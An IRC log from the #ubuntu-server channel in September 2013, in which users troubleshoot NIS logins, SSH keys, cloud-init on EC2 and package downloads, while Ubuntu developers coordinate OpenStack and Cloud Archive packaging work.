<ancaster> Hi. I'm in charge of techy stuff in a small university lab with several workstations. Authentication is done by NIS on our fileserver (10.04). If this server dies for whatever reason, no one can log in, obviously, but how do I go about making a local admin account (perhaps root) that CAN log in without NIS?
<ancaster> I've setup a local user in /etc/passwd, but logging in with that user when the NIS server is down, just hangs
<Sling> ancaster: your /etc/nsswitch.conf file determines what authentication backends are used
<Sling> what does it look like now?
<ancaster> passwd/group/shadow are all compat
<Sling> no references to nis ?
<ancaster> no.the last line in the workstations' /etc/passwd file is: +::::::
<ancaster> i was under the impression that that signifies an NIS lookup
<Sling> it does, but its not really the 'modern' way of configuring this ;)
<Sling> it doesnt allow for shadow passwords, also it needs to query the NIS server every time a UID/GID is looked up
<ancaster> i see
<Sling> so you might want to investigate using nsswitch instead, which allows to you specify 'nis files' to try file-based authentication when nis is unavailable
<ancaster> ah, lovely.
<Sling> or 'files nis' if you want to use file-based auth primarily, and use NIS for any accounts that aren't present in /etc/passwd
<ancaster> yeah, i think that's how i'd like it to work.
<ancaster> I was looking at the ubuntu wiki for help, but i guess it's misleading: https://help.ubuntu.com/community/SettingUpNISHowTo
<ancaster> As it talks about setting up the /etc/passwd file as we have
<Sling> its outdated I reckon
<Sling> http://tldp.org/HOWTO/NIS-HOWTO/settingup_client.html#AEN313
<ancaster> As a general rule do you normall go to tldp for up to date documentation?
<Sling> no, this was just from googling
<Sling> i usually just go to the project's own documentation site/wiki/whatever
<ancaster> okay.
<ancaster> thanks so much for your help.
<Sling> no problem
<ccabrey> Hi all, I'm trying to configure a KVM bridge for a KVM host. The twist is that the primary interface I want to use a bridge with is a bond (802.3ad). I'm having trouble getting this to work and there seems to be a sparse amount of information on this topic online. Any thoughts?
<gartral> hello all, i'm having an issue working with SSH keys, no matter what I've tried my desktop is always asking me for a password when SSHing out to another machine I have 4 machines that i really need ssh access too, one is for a private git
<gartral> i'm to the point of nearly crying over why I cant f***ing ssh into any, ANY machine from my desktop
<sarnold> gartral: does ssh-add -l show your key added to the local keychain?
<gartral> sarnold: yes
<sarnold> gartral: are permissions on your home directory, ~/.ssh/, ~/.ssh/* directories and files all correct on the servers you're trying to log in to? (sshd is very picky, group write access is not allowed...)
<gartral> sarnold: yes, i ran chmod -R 600 ./.ssh on the server and my desktop
<sarnold> gartral: hrm, 600 isn't right either :) 700 for ~/.ssh, 644 for ~/.ssh/authorized_keys 600 or 400 for ~/.ssh/id_rsa...
<smoser> utlemming, manjo had a qustion for you about our cloud images and arm.
<zul> adam_g:  https://code.launchpad.net/~zulcss/python-novaclient/2.15.0/+merge/187233  https://code.launchpad.net/~zulcss/cinder/cinder-fix-ftbfs/+merge/187236 and https://code.launchpad.net/~zulcss/keystone/oauth-refresh/+merge/187239
<smoser> i'm not sure ifyou can answer or not... wish rbasak was around.
<adam_g> zul, ack
<adam_g> zul, any luck with python-cliff?
<zul> adam_g:  yeah just trying out now
<utlemming> mango: what's up?
<utlemming> manjo: ^
<manjo> utlemming, trying to use our armhf builds to boot on ARM using kvm/qmeu but I don't seem to be able to get a prompt ... followed the wiki & smoser 's blog
<manjo> utlemming, ci images
<gartral> sarnold: it's STILL asking for my damn password!
<manjo> utlemming, so the Q is does our std build ci images work on arm ?
<utlemming> manjo: it should....it defaults to the serial console though
<utlemming> manjo: are you on bare metal?
<manjo> utlemming, I set serial to stdout
<utlemming> manjo: what is the device type that you're using?
<manjo> utlemming, dev/kvm ?
<utlemming> manjo: so this is kvm on arm?
<manjo> yes that is correct
<manjo> ARM system using dev/kvm booting armhf ci images using qemu
<manjo> utlemming, I used smoser 's instructions on wiki and his blog .. both seem to print some messages wrt to audio drivers and then no promt
<gartral> why is something that used to be so freaking simple being such a pain now
<manjo> so I get bunch of messages about ALSA etc ... and then nothing more
<utlemming> manjo: can you file a bug with what you're seeing?
<adam_g> zul, did anything come of that patch to avoid the oauth requirement?
<manjo> utlemming, yep can do right away .. who would I assign that to ?
<utlemming> manjo: me
<manjo> ok great will do
<smoser> manjo, you get the kernel to boot ?
<smoser> manjo, get a kernel console log. boot with a serial device logging to a file.
<manjo> smoser, I am guessing it is booting coz it prints some alsa messages .. which I am guessing comes from the kernel
<manjo> smoser, ack
<manjo> smoser, I did something like -serial stdio
<manjo> smoser, so can I say -serial /tmp/foo ?
<smoser> -serial file:serial.log
<manjo> smoser, ack
<gartral> sarnold: any other ideas?
<manjo> smoser, -serial file:log does not have anything written to it
<sarnold> gartral: try ssh -v to see if there's helpful messages?
<smoser> manjo, how are you running it ?
<manjo> udo qemu-system-arm -machine vexpress-a15 -cpu cortex-a15 -enable-kvm -m 512M -kernel /boot/vmlinuz -append "console=ttyAMA0 earlyprintk=serial root=/dev/mmcblk0  ro rootfstype=ext4" -serial file:serial.log -initrd /boot/initrd.img -drive if=sd,cache=writeback,file=./disk.raw -net nic -net user,hostfwd=tcp::2223-:22 -display none
<gartral> sarnold: I have hang on http://paste.ubuntu.com/6151087/
<manjo> smoser, does that look sane ?
<smoser> well i would teel the kernel to write to ttyS0
<smoser> not ttyAMA0
<smoser> but i really dont know anything.
<manjo> smoser, cat /proc/cmdline
<manjo> console=ttyAMA0 nosplash
<sarnold> gartral: are you sure your server supports DSA keys?
<gartral> sarnold: I've tryied both rsa and dsa keys
<manjo> smoser, does not make a diff with ttyS0 either
<gartral> sarnold: and it isn't saying key refused, it's *JUST* giving me a password prompt, with keys that aren't passworded
<gartral> sarnold: also, this is happening on ALL servers that i'm trying too connect to
<sarnold> gartral: do the servers log anything?
<smoser> manjo, what ubuntu release is 'disk.raw' ?
<manjo> saucy
<manjo> current
<manjo> generated as per instructions on wiki page https://help.ubuntu.com/community/UEC/Images#ARM_Images
<manjo> smoser, don't know why serial captures nothing either
<zul> adam_g:  http://people.canonical.com/~chucks/ca/
<manjo> utlemming, smoser so you are able to use std ci images on intel with kvm/qemu ?
<manjo> with saucy is what I meant to ask
<adam_g> zul, +1
<adam_g> zul, what was the review for the keystone patch that made extension's python deps optional?
<adam_g> can't seem to find it
<zul> adam_g: gimme a sec
<smoser> manjo, cloud images work fine on intel with kvm. yes.
<adam_g> zul, wait
<adam_g> zul, dont upload! :)
<smoser> intel (amd64 or i386)
<zul> keystone?
<utlemming> manjo: I have a mtg, but i'll look at this after
<adam_g> zul, cliff
<adam_g> zul, it just ftbfs in precise PPA
<utlemming> manjo: if you can give me a few hours, I'll get you an answer
<manjo> ok
<zul> adam_g: yeah it needs to depend on a newer version of cmd2
<zul> just noticed lemme fix this in saucy and then ill re-upload it to the ca
<izanagisan> if I make a symlink to a file, can I edit it though FTP transparently?
<izanagisan> through*
<sarnold> izanagisan: some ftp servers may chose to not follow symlinks.
<zul> hallyn:  ping
<izanagisan> crap. I just don't want to FTP directly to the config folder where this particular file is
<izanagisan> it's caused hell in the recent past
<hallyn> zul: .
<zul> hallyn:  if you specify a lxc.console = in your lxc config does the file get created for you when the container starts?
<hallyn> zul: no
<zul> hallyn:  ok just double checking im doing the write thing here
<hallyn> maybe
<hallyn> zul: yeah it creates it if it doesn't exist
<hallyn> (actually, if it can't write to it)
<zul> ah cool
<zul> one less step for me
<utlemming> manjo: did you file a bug?
<utlemming> manjo: I'm able totake a look at it now
<autojack> anyone here have experience with cloud-init in EC2? I am trying to create a custom AMI based on the official Ubuntu Precise AMI. when I start up my new AMI, cloud-init does not seem to trigger. I want it to run, set up puppet and trigger a run. I'm creating the AMI  by launching an instance, letting cloud-init and then puppet run to configure it, and using the ec2-bundle-vol command.
<manjo> utlemming, sorry got pulled into a call ... I will file asap and ping you
<urthmover> is it possible to force a server to identify specific physical disks as specified /dev/sda /dev/sdb?  I have a system with 10 disks and I'd like 2 specific physical disks to be identified (which happen to be different make/models) as /dev/sda /dev/sdb
<urthmover> I realize after the disks are identifed I can use UUID....but right now I'm building software RAID arrays using mdadm....and having things "orderly" might help my sanity
<patdk-wk> urthmover, check out udev
<patdk-wk> really though, I wouldn't bother
<urthmover> ok
<urthmover> thanks patdk-wk
<autojack> anyone here have experience with cloud-init in EC2? I am trying to create a custom AMI based on the official Ubuntu Precise AMI. when I start up my new AMI, cloud-init does not seem to trigger. I want it to run, set up puppet and trigger a run. I'm creating the AMI  by launching an instance, letting cloud-init and then puppet run to configure it, and using the ec2-bundle-vol command.
<gholms> If you're bundling something that has already booted you might have to clear state out of /var/lib/cloud, IIRC.
<autojack> I did that. I exclude /var/lib/cloud/instance and instances.
<autojack> what's the best way to re-run cloud-init?
<gholms> You could probably just re-run the init script.
<autojack> I'm doing that and it seems to do nothing.
<gholms> So much for that idea, then.
<autojack> returns 0 and logs nothing.
 * gholms lets someone more knowledgeable about cloud-init+upstart answer
<autojack> heh, thanks :)
<autojack> oh here we go
<autojack> the log says  config-puppet already ran config
<autojack> I feel like there must be some other lockfile that is stopping it from running.
<autojack> I wish I could figure out a debug mode.
<Guest80819> sudo reboot <<< for the 5th time today, thinking of running jest plain debian wheezy already..... rant
<sarnold> autojack: there's always something interesting on smoser's blog posts, but I don't know off-hand if he's written anything targetted directly at what you're doing.. check this out though: http://ubuntu-smoser.blogspot.co.uk/2013/02/using-ubuntu-cloud-images-without-cloud.html
<autojack> sarnold: thanks! I don't see anything in there that applies though. I AM running this on EC2. I'm just trying to create a modified instance.
<sarnold> autojack: one of the comments abour changing user / group information looked more useful than the contents of that specific post..
<autojack> aha
<autojack> AHA
<autojack> I figured it out!
<autojack> as the Angry Video Game Nerd would say, "ASSSSSSSSSSS!" in a mid-west accent.
<autojack> first of all, I needed to exclude /var/lib/cloud/sem from my manifest.
<autojack> second, I needed to exclude /var/lib/puppet/ssl apparently.
<autojack> sheesh.
<Guest80819> how do i get my ubuntu server to cook me some bacon?
<sarnold> sudo make me a sandwich^W^Wbacon
<Guest80819> haaaa yes thats the command I was looking for thank you.....
<smoser> autojack, cloud-init should "just work" and re-run first boot stuff after being captured.
<smoser> there is not necessarily a reason to rm -Rf /var/lib/cloud, but its fine to do that.
<smoser> autojack, config-puppet really should run "per-instance".
<smoser> meaning it should run any time there is a new instance-id found.
#ubuntu-server 2013-09-25
<leons> Hello
<caraconan> Hi there. With this setup (http://paste.debian.net/45868/) I will upgrade packages on "quantal multiverse" and the other non-official repos as well? Thanks
<caraconan> Nobody?
<zul> jamespage:  we need a newer oslo.config
<jamespage> zul, ack
<nuclearbob> stgraber: is it possible to create an lvm-backed lxc inside of another lvm-backed lxc and have them both using the same volume group?
<SwashBuckla> Hi there  -- I am trying to write a well-behaved upstart job, and want to invoke some command when "restart" is called: http://upstart.ubuntu.com/cookbook/#restart
<SwashBuckla> it's not pre-stop or pre-start. When I do a restart the calls for those happen in the reverse order
<SwashBuckla> I get pre-start before pre-stop!
<Diegonat> hi... i was wondering if apt-transport-spacewalk works well with spacewalk. For working well I mean that I can manage ubuntu machines.Installing new software etc...
<voidnull> hello
<voidnull> hello you should explicitly slec one to install
<voidnull> e: package libcompress-zlib-perl has no installation candidate ...
<voidnull> could someone help me ?
<roaksoax> hallyn: howdy!! i think we are experiencing this: https://bugzilla.redhat.com/show_bug.cgi?id=981973
<roaksoax> in saucy
<uvirtbot> roaksoax: Error: Could not parse XML returned by bugzilla.redhat.com: HTTP Error 404: Not Found
<roaksoax> smoser: ^^
 * hallyn reads
<hallyn> roaksoax: so looking at the bug, it looks like dnsmasq needs a fix
<roaksoax> hallyn: yeha just read that too :)
<roaksoax> hallyn: sorry for the noise but I came referenced from a libvirt bug :)
<hallyn> np :)
<resno> how can i find out the current version of software being shipped in ubuntu?
<resno> specifically php in this case
<smoser> resno, either 'apt-cache policy php5' or https://launchpad.net/ubuntu/+source/php5
<resno> smoser: how can i know when the next version is scheduled for released
<smoser> resno, well, you'd see a '-proposed' entry for your release there. if there was something in the queue.
<jamespage> zul, Error trying to load config from /etc/swift/proxy-server.conf: (dnspython 1.9.4 (/usr/lib/python2.7/dist-packages), Requirement.parse('dnspython>=1.10.0'))
 * jamespage faceplats
<jamespage> fixing now
<zul> serisouly?
<jamespage> zul, can I get a pre-ack on backporting python-dnspython to the CA please
<zul> jamespage:  of course
<jamespage> https://code.launchpad.net/~james-page/swift/missing-dnspython/+merge/187535
<jamespage> zul, ^^
<zul> jamespage:  +1
<jamespage> adam_g, I've been sprinkly saucy love over the openstack charms this afternoon
<jamespage> adam_g, needed so fixes for apache24
<jamespage> and for 'saucy': 'havana'
<adam_g> jamespage, spinkly saucy nice
<jamespage> adam_g, just pushing the car back up the hill for another saucy test
<adam_g> jamespage, im gonna merge all of our current pyredux stuff into our QA branches
<jamespage> adam_g, good idea
<jamespage> adam_g, its all looking OK so-far
<jamespage> had todo a few quantum/neutron tweaks but nothing major
<jamespage> flushed out a missing dependency upgrade we needed for swift-proxy that no-one had spotted
<jamespage> nice
<adam_g> yea i saw that come thru
<smoser> roaksoax, were you going to try to get a maas in soon ?
<roaksoax> smoser yes
<smoser> roaksoax, alright. i'm only really pinging because infinity was bugging me about ubuntu-cloudimage-keyring being in main
<smoser> to which my esponse was "maas will depend on it"
<roaksoax> smoser: ok
<roaksoax> fo you need it today?
<smoser> um.. probalby not.
<smoser> and i would like to have rvba's branch in
<smoser> https://code.launchpad.net/~rvb/maas/curtin-install/+merge/187055
<roaksoax> smoser: so i
<roaksoax> smoser: k
<smoser> roaksoax, i just pinged allennap on reviewing that one.
<smoser> we also clearly want "saucy is an actual release" fix in also.
<smoser> jamespage, still around?
<smoser> i just uploaded to cloud-tools-proposed with juju and mongodb and lxc.
<smoser> juju-core built
<smoser> while mongodb is still building
<smoser> do i need to kill it? if its not important that I build against that newer mongodb, then why is mongodb there.
<smoser> i guess its just not a build-dep
<jamespage> smoser, yep
<jamespage> smoser, its not a built against thats important
<jamespage> its runtime use that is
<jamespage> important
<smoser> right. ok. so we're just waiting on build of mongodb.
<smoser> which took like 4 hours another time.
<jamespage> smoser, yeah - it takes some time
<autojack> smoser: hi, I was looking for help with cloud-init yesterday. I made some progress but I am still having at least one issue. and from what you said it sounds like my solution shouldn't have been needed.
<autojack> I have meetings for a few minutes, I'll explain more when I get back. maybe you can point me in the right direction.
<smoser> autojack, sure.
<smoser> yeah, you should not need to do what you were doing.
<smoser> what release was it ? (precise, saucy?)
<autojack> precise.
<autojack> so I'll briefly explain what I'm trying to do: we normally use the official Ubuntu Precise AMI with cloud-init, and in our userdata we pass puppet config info and a couple of other minor things. what I wanted to do was start up an instance that way, let puppet run on it, and then create an AMI from that. but when I did, after startup it did not reconfigure puppet. I should say that I was excluding /etc/puppet from the AMI. maybe I shouldn't hav
<jamespage> adam_g, nearly there with saucy support
<jamespage> but I need to add apache2.4 support to the apache helper
<jamespage> but that will be tomorrow now
<autojack> in the end, what seemed to work was excluding /var/lib/cloud/instance(s) and /var/lib/cloud/sem (and also /var/lib/puppet/ssl). that at least let cloud-init run. but now I have a problem where when it tries to install packages, I get errors that none of the package repos we have set up are trusted. including even the default official Ubuntu repo. so somehow it seems like the signing keys for those are missing, but I can't understand why.
<autojack> having dug around some more, I see what you were saying. since the new instance will have a new instance ID, it would seem like cloud-init should start over. maybe I was confusing myself.
<autojack> it took awhile for me to figure out how I could trigger a run of cloud-init from the command line.
<adam_g> jamespage, hmm i saw the bash charm failing with the new apache2.4, when trying to set the webroot
<adam_g> jamespage, same place in the py version?
<adam_g> also
<adam_g> http://people.canonical.com/~agandelman/ca/folsom/policykit-1-0.104-2ubuntu1.1~cloud0/
<adam_g> ^ we need this in CA folsom to build new libvirt update
<uvirtbot> adam_g: Error: "we" is not a valid command.
<roaksoax> smoser: ok, if that lands today I could mkae an upload
<roaksoax> and get it over with now
<mibofra> guys, I'm trying to use the deldovecotuser script found in the ubuntu help site about vmail boxes. It is used to cancel users/virtual mailboxes, but I receive at line 18 of the script an illegal option (it's -n, read command)
<mibofra> How can I fix it?
<TheLordOfTime> any way to force IPv4 only for apt-get and updates?
<jamespage> adam_g, yeah
<jamespage> adam_g, sites have to end with .conf now
<jamespage> and config goes into /etc/apache2/conf-available with an assoc a2enconf call
<adam_g> jamespage, ah ya
<smoser> gholms, ping
<smoser> -StandardOutput=tty
<smoser> +StandardOutput=journal+console
<smoser> does that make some assumption on newness of systemd?
<gholms> smoser: Something tells me it would require v38 or later since that's when they added it.
<gholms> I can check for sure if you want.  Are you concerned about a particular distro?
<smoser> gholms, only really concerned if that is "really new" or something
<smoser> honestly, its more your problem than mine :)
<gholms> Heh
<gholms> Well, it's certainly in every active fedora version.  :)
<smoser> ok. so i did this:
<smoser> http://paste.ubuntu.com/6155684/
<smoser> oh fiddle faddle
<gholms> Hmm...  :)
<smoser> http://paste.ubuntu.com/6155703/
<smoser> gholms, ^
<gholms> Mind using print instead?  Most messages lack trailing newlines.
<smoser> well we should fix them then.
<smoser> and what was going to /dev/console didn't have them.
<smoser> right?
<gholms> Right
<autojack> so, can anyone tell me where apt repo PGP/GPG keys are stored? I can't figure out why the new AMI I built out of an old one is saying that it doesn't have keys for ANY of the repos that are set up.
<smoser> gholms, http://paste.ubuntu.com/6155725/
<autojack> wondering if I excluded them somehow.
<smoser> thats the only one i see . in just reading grep
<SwashBuckla> ooh! The nice russian lady has invited me back for... second interview of for accommodation
<SwashBuckla> ...
<gholms> That's the one I keep encountering, anyway.
<smoser> fixed that here.
<gholms> The problem here is that now I sometmes have output getting journaled, and sonetines not.
<gholms> Dang phone keyboard..
<smoser> youdo ?
<gholms> If only the distro object wasn't so far away it could just ask if it's using systemd.
<smoser> the problem is you dont have /dev/console. you should fix your broken container.
<gholms> If it gets written directly to the console it doesn't get captured.
<gholms> That's one of my other motives here, I guess.
 * gholms hrms
<gholms> The "lack of console" thing is the closest thing to an actual bug, and frankly, I consider that broken as well.
<smoser> stuff could definitely be beter here.
<smoser> when we write keys to the console, we want them to go to the console. but there is no way of kowing really, "would this get to the console".
<smoser> i dont recall all the things i have thought about in this area.
<gholms> Maybe I'd be better off framing this is as a "use stdout->journal+console when using systemd" fix instead.
<gholms> I jusr don't know of a good way to get access to the distro object to ask it inside the log function.
<zul> stgraber:  ping
<gholms> Bah, meeting time.  I'll be back in a bit.
<gholms> Feel free to reply in the mean tine if you want.
<stgraber> zul: pong
<zul> stgraber:  lxc-device doesnt support del yet does it?
<smoser> gholms, join #cloud-init
<stgraber> zul: I can't remember implementing del indeed, wouldn't be particularly hard though
<gyre007> guys...I'm having a bizzare problem with openssl and certificate validty/verification...
<gyre007> im trying to get the librato metrics working on Ubuntu 12.04
<gyre007> and this is what IM getting https://gist.github.com/milosgajdos83/6704808
<gyre007> essentially when I give openssl a path to certificates directory all works fine
<gyre007> when I do NOT then IM getting "certificate not trusted"
<gyre007> anyone idea ?
<sgran> /usr/share/ca-certificates is not in the default path for certs
<sgran> dpkg-reconfigure ca-certificates and pick that cert
<autojack>  so, can anyone tell me where apt repo PGP/GPG keys are stored? I can't figure out why the new AMI I built out of an old one is saying that it doesn't have keys for ANY of the repos that are set up.
<exnntech> Has anybody ever heard of a Ubuntu Server (12.04) installation not rebooting over SSH when sudo -i 'd
<exnntech> #Tumbleweed
<sarnold> autojack: I believe what you want is ubuntu-keyring
 * thumper thinks it is all the US and Europe people not around
<autojack> sarnold: what is that, a package?
<sarnold> autojack: yes
<autojack> but... so I launched an instance using the official Ubuntu Precise AMI, everything works fine. I built a new AMI out of that, and all my apt-get attempts fail complaining that the keys are missing.
<autojack> so I can't figure out how those are being missed.
<autojack> or if something else is broken.
<cjh> quick question about preseed.  Is it possible to have 2 late_commands?
<ArielX_> can anyone put me through on how to create an email smtp server on ubuntu.. thanks
<sarnold> ArielX_: that's a large topic.. you might wish to read though some guides before starting: https://help.ubuntu.com/12.04/serverguide/email-services.html
<ArielX_> Next, generate or obtain a digital certificate for TLS. See Certificates for details. This example also uses a Certificate Authority (CA). For information on generating a CA certificate see Certification Authority.
<ArielX_> how do I generate the digital certificate
 * gholms recommends clicking the link in that sentence
<germanstudent> Hey. Is there a way to limit NFS traffic speed?
<sarnold> germanstudent: as far as I know there's no _easy_ way to do so; I think you have to use the generic 'tc' facility to classify packets and rate limit there. See chapter 9 and examples in chapter 15 here: http://lartc.org/howto/
<germanstudent> sarnold, thank you!
<sarnold> germanstudent: good luck :) learning tc has been on my todo list for seven or eight years.. hehe.
<germanstudent> sarnold, hehe :)
<jcastro> out of curiosity, why limit nfs?
#ubuntu-server 2013-09-26
<dougb> i'm running tail -f 'file.log' | grep --line-buffer 'query' > output.txt on an nginx log file that gets written about 3.4 mil lines a day, would that consume any memory? i'm looking at top right now and it doesn't look like it's consuming memory as far as i can tell
<sarnold> dougb: I'd expect both to consume less than one megabyte of RSS
<dougb> ok great, thank you
<bobbyz> Out of curiosity, has anyone here used BloomIP as a hosting provider?
<koolhead17> jamespage: hello there
<pesky> good morning everyone. I've installed some updates on one of our servers this morning and two things did happen after a reboot: naming of my second NIC did change from eth1 to eth2 (did have to delete /etc/udev/rules.d/70-persistent-net.rules) and I did get a message for EDAC at boot (first time ever) that /usr/sbin/edac-ctl was missing, installed edac-utils, but there is still a message at boot:
<pesky> Not enabling Memory Error Detection and Correction since EDAC_DRIVER is not set
<pesky> edac-ctl --status states that the drivers are loaded and I can find the driver (i7core_edac) per lsmod. Does that mean that I can ignore this message because the drivers were loaded anyway?
<caraconan> Hi there. Can somebody please clarify what will happen in my case if I run 'sudo do-release-upgrade'? http://paste.debian.net/46339/ Apparently my ubuntu server is up to date
<quietone> hi, I can't ssh from ubuntu server to ubuntu desktop, all 12.04
<geser> quietone: does the ubuntu desktop has the SSH server (openssh-server) installed? IIRC the desktop has only the client installed by default
<mardraum> that's correct, unless you chose it during installation
<cwillu_at_work> or install it later, obviously
<jamespage> adam_g, a load of the charms have grown exec.d support - but I don't think we have that implemented
<jamespage> I think there is a helper for that
<exnntech> Looking for help and info on Landscape service
<rostam> HI I would like to download a binary ubuntu package and its dependencies to my server, but not installed, how could I do that? thx
<exnntech> apt-get whatever ?
<exnntech> Hey jacalvo
<geser> rostam: "sudo apt-get -d install $package" (but it only works for packages/dependencies which you doesn't have already installed)
<rostam> geser: thank you so much
<smoser> anyone have thoughts on this ?
<smoser> https://wiki.ubuntu.com/ServerTeam/CloudArchive
<smoser> that (and cloud-tools archive) are more complex than ideal to enable.
<smoser> any thoughts on a way to make that easier ?
<jamespage> smoser, add something to python-software-properties  - thats alwaysbeen on the plan
<jamespage> but we #failed at that
<jamespage> smoser, that incorrect support diagram is back again
<jamespage> folsom, grizzly and havana are not supported until the end of 12.04 support
<zotta> hi, i did apt-get upgrade
<zotta> and udev did not upgrade properly, because the post install script hangs without error message
<zotta> i tried setting the package to hold
<ws2k33> hello i want that my ubuntu machine is able to send out email via an external smtp server how should this be done ?
<zotta> but it does not work, because the package is partially installed
<zotta> how do i fix that?
<qman__> ws2k33, apt-get install postfix, select to use a smarthost, put your external SMTP server as the smarthost
<smoser> jamespage, nice.
<smoser> jamespage, so should we do the python-software-properties thing?
<jamespage> smoser, something like 'add-apt-repository cloud:grizzly'
<smoser> the wierd thing is we'd add it in saucy
<smoser> but it sin't really saucy related.
<jamespage> smoser, yeah - we would need to backport it to precise
<zotta> can someone tell me how i could fix the partially installed udev package?
<smoser> and it would be *wrong* on saucy, jamespage
<jamespage> smoser, yes - but that could be included in the code
<smoser> we'd be adding broken / incorrect code :)
<smoser> that just seems weird
<jamespage> smoser, check for 12.04 and warning message/error out
<ws2k33> qman thanks you
<smoser> jamespage, maybe i will do that today.
<jamespage> smoser, add-apt-repository cloud:tools ?
<zotta> ...
<smoser> maybe cloud:openstack-grizzly and cloud:tools ?
<jamespage> smoser, I'd like to keep it consistent with the charm openstack-origin stuff
<jamespage> smoser, which is currently cloud:precise-grizzly
<jamespage> but the precise- is not relevant (that should be fixed during the redux)
<smoser> hm..
<smoser> i'm just trying to think of logic for that. to "know" without a hard coded list if the release is good.
<smoser> so we dont have to SRU for 'j' name.
<smoser> maybe i just try to allow 'cloud:j*' and try.
<smoser> :)
<jamespage> smoser, while you are here
<jamespage> smoser, I'm seeing update-apt-xapian-index running on first boot of cloud-images
<jamespage> smoser, which is chewing a fair bit of memory and causing some juju/charm related issue
<smoser> jamespage, https://bugs.launchpad.net/ubuntu/+bug/1227425
<uvirtbot> Launchpad bug 1227425 in ubuntu "Cloud images do not need apt-xapian-index" [Undecided,New]
<smoser> i dont kno when that got into the images.
<jamespage> smoser, maybe sometime recently as this was not problem until sometime in the last 3 weeks
<smoser> jamespage, its been in images since 12.04
<jamespage> smoser,trying to figure out why is just started to cause problems
<smoser> so something else must have changed that made it decide to rupdate itself.
<jamespage> smoser, bootstrapping on a m1.tiny now fails
<smoser> as i said in that bug, i'm not opposed to dropping tasksel
<jamespage> so does deploying mysql on a m1.small
<jamespage> with default settings...
<smoser> jamespage, dropping tasksel would drop aptitude
 * jamespage shrugs
<jamespage> whats aptitude? :-)
<smoser> and aptitude is what Recommends apt-xapian-index.
<smoser> i agree with your feelings on aptitude
<smoser> but i often see people document
<smoser>  aptitude safe-upgrade
<smoser> or the like
<Dry_Lips> Hi, I've got Ubuntu 12.04 with Nginx. However, css isn't loaded for some reason. Any idea why?
<smoser> so i'm somewhat weary of dropping that from a cloud iamge.
<Dry_Lips> In other words, the html of my site loads, but not the css. And I've tested the site on a development server, with no problems whatsoever...
<jamespage> smoser, yeah - I'm wary as well tbh
<pesky> Dry_Lips: in my experience, you'll have to ignore the cookie header: http://paste.ubuntu.com/6158741/
<Dry_Lips> pesky, I don't use cookies, I've only got .js = adobe edge webfonts... What file was that paste from, btw?
<pesky> Dry_Lips: from one of our own servers, we have a CDN
<pesky> Dry_Lips: are you really sure you don't use cookies (checked response header)?
<Dry_Lips> pesky, this is a simple "page under construction" site... There is one java script in order to load the Adobe font, but that's it...
<qman__> Dry_Lips, a simple google for "nginx css" reveals others having issues defining the mime types
<Dry_Lips> yeah, I saw that too qman___
<Dry_Lips> But I checked the mime.types, and I didn't see any suspicious
<qman__> I don't use nginx myself, it just seems to fit, and keep in mind that text/css is a different mimetype from text/html
<zul> jamespage:  https://code.launchpad.net/~zulcss/nova/lxc/+merge/187796
<zotta> another question: when i log in to ssh, it prompts me immediately for my username
<zotta> but after pressing enter
<zotta> it takes more than 10 seconds
<zotta> to ask for my password
<zotta> after that it is fast again
<zotta> what does take so long?
<smoser> jamespage, if you want to dig on that bug, that'd be good. i'm really very ok with not having that silly index thing in the images.
<qman__> zotta, the openssh client doesn't prompt for a username; putty prompts for a username before it tries to connect
<qman__> the delay is the encryption handshake taking place, the username being submitted, and waiting on the authentication challenge
<qman__> it can happen if you have a poor network connection or if the server's CPU is slow or overloaded, or if something is wrong with your authentication system server-side
<andol> zotta: DNS timeout, while looking up the ptr record of the ip you are connecting from?
<zul> jamespage/adam_g: https://code.launchpad.net/~zulcss/python-keystoneclient/bash-completetion/+merge/187806
<mgz> smoser: I have a cc_write_files issue
<mgz> wonder if something has been borked there recently
<mgz> try to create a file, and set owner to ubuntu:ubuntu
<mgz> and the cloudinit fails with:
<mgz> OSError: Unknown user or group: 'getpwnam(): name not found: ubuntu'
<utlemming> mgz: which version of ubuntu?
<mgz> I note that cc_write_files happens ridiculously early (before key generation even), and before cc_users_groups, but thought ubuntu should exist in the image anyway
<smoser> oh. bugger.
<mgz> utlemming: tried both raring, image from this month, and saucy beta1
<smoser> mgz, it makes sense.
<smoser> there is no 'ubuntu:ubuntu' at that point
<mgz> should cc_write_files just be bumped a bit later, to after cc_users_groups?
<smoser> write_files runs very early. before the user is created.
<smoser> well if it runs later, it can affect less.
<mgz> smoser: I swear this used to work :)
<smoser> it works on 12.04
<smoser> because ubuntu is builtin to the image
<mgz> shall I bug a file?
<smoser> i cant imagine how i'd fix it.
<mgz> split cc_write_files in two, defer any with owner till after user creation?
<mgz> adds a nice annyoing level of complexity
<utlemming> its not that easy
<utlemming> write_files runs as part of the init portion
<utlemming> while create users runs a cloud-config module
<smoser> they both run as cloud-init-modules
<smoser> mgz, you can actually chnage the order of those yourself .
<utlemming> oh you're right...
<smoser> or just add another 'write_files' afterwards.
<smoser> :)
<smoser> i dont have a good solutoin.
<smoser> you have a sane use case.
<smoser> mgz, i'd consider adding a 'write_user_files' module.
<mgz> that would seem reasonable
<smoser> alright. well file a bug.
<smoser> and submit a patch if you'd liek
<mgz> filing
<smoser> should be pretty simple.
<mgz> smoser: filed bug 1231541
<uvirtbot> Launchpad bug 1231541 in cloud-init "Using owner with write_files in cloud config breaks" [Undecided,New] https://launchpad.net/bugs/1231541
<rostam> Hi I am trying to download a binary package, xorg, with its dependencies, the command "apt-get -d install xorg" looks to my local system and since the package is already installed it does nothing. Is there a way I can work around this please? thx
<adam_g> zul, has your lxc driver been pitched upstream yet?
<zul> adam_g:  not yet its way past feature freeze im going to pitch it for icehouse
<smoser> rostam, apt-get install --reinstall --download-only xog
<rostam> smoser, thank you so much.
<rostam> smoser,  how could i issue the command that it install the packages to the current directory? thx
<babinlonston> I Need to Setup a Chat server in Ubuntu server , im planning to Buy a VPS For that , Which Chat  Software i can Choose and It want to be a Open Source .... thanking u all
<smoser> "install into current directory" ?
<babinlonston> what ever ....
<babinlonston> for viewer it want to be like a messenger
<babinlonston> same as yahoo
<rostam> smoser, the apt-get command install the packages to the /var/cache/apt/archive  I want them to install in different directory. That what I meant by current.
<genii> rostam: That default value for that is Dir::Cache="var/cache/apt/"  if you want to change it, you need to add to the apt-get command an option like: -o Dir::Cache="/full/path/to/where/you/want"
<rostam> genii,  I think I made an error, it gives me error: E Unable to locate package install. Here is what I issued:
<rostam>  apt-get install -o Dir::Cache="/home/Work/CarboniteDepo" install --download ffmpeg
<smoser> this seems to work
<smoser> http://paste.ubuntu.com/6159522/
<rostam> smoser, yes it worked thank you and genii thank you.
<smoser> rostam, note, that you dont even have to be root there.
<smoser> which is nice.
<rostam> smoser, yes and thx again
